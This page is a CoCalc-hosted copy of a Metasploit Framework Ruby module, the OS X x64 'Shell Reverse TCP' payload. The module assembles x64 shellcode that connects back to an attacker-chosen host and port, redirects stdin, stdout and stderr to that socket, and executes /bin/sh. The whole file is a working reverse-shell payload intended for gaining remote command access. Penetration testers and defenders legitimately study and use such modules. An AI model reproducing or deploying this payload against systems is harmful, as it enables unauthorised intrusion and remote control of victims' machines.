CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
Views: 11780
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7


8
  CachedSize = 128

9


10
  include Msf::Payload::Single

11
  include Msf::Payload::Osx

12
  include Msf::Sessions::CommandShellOptions

13


14
  def initialize(info = {})

15
    super(

16
      merge_info(

17
        info,

18
        'Name' => 'OS X x64 Shell Reverse TCP',

19
        'Description' => 'Connect back to attacker and spawn a command shell',

20
        'Author' => 'nemo <nemo[at]felinemenace.org>',

21
        'License' => MSF_LICENSE,

22
        'Platform' => 'osx',

23
        'Arch' => ARCH_X64,

24
        'Handler' => Msf::Handler::ReverseTcp,

25
        'Session' => Msf::Sessions::CommandShellUnix

26
      )

27
    )

28


29
    # exec payload options

30
    register_options(

31
      [

32
        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),

33
        Opt::LHOST,

34
        Opt::LPORT(4444)

35
      ]

36
    )

37
  end

38


39
  # build the shellcode payload dynamically based on the user-provided CMD

40
  def generate(_opts = {})

41
    lhost = datastore['LHOST'] || '127.0.0.1'

42
    # OptAddress allows either an IP or hostname, we only want IPv4

43
    unless Rex::Socket.is_ipv4?(lhost)

44
      raise ArgumentError, 'LHOST must be in IPv4 format.'

45
    end

46


47
    cmd = (datastore['CMD'] || '') + "\x00"

48
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')

49
    encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')

50
    encoded_host_port = format('0x%.8x%.8x', encoded_host, encoded_port)

51


52
    shell_asm = %(

53
      mov eax,0x2000061

54
      push 0x2

55
      pop rdi

56
      push 0x1

57
      pop rsi

58
      xor rdx,rdx

59
      syscall

60
      mov r12,rax

61
      mov rdi,rax

62
      mov eax,0x2000062

63
      xor rsi,rsi

64
      push rsi

65
      mov rsi, #{encoded_host_port}

66
      push rsi

67
      mov rsi,rsp

68
      push 0x10

69
      pop rdx

70
      syscall

71
      mov rdi,r12

72
      mov eax,0x200005a

73
      mov rsi,2

74
      syscall

75
      mov eax,0x200005a

76
      mov rsi,1

77
      syscall

78
      mov eax,0x200005a

79
      mov rsi,0

80
      syscall

81
      xor rax,rax

82
      mov eax,0x200003b

83
      call load_cmd

84
      db "#{cmd}", 0x00

85
    load_cmd:

86
      pop rdi

87
      xor rdx,rdx

88
      push rdx

89
      push rdi

90
      mov rsi,rsp

91
      syscall

92
    )

93


94
    Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string

95
  end

96
end

97


98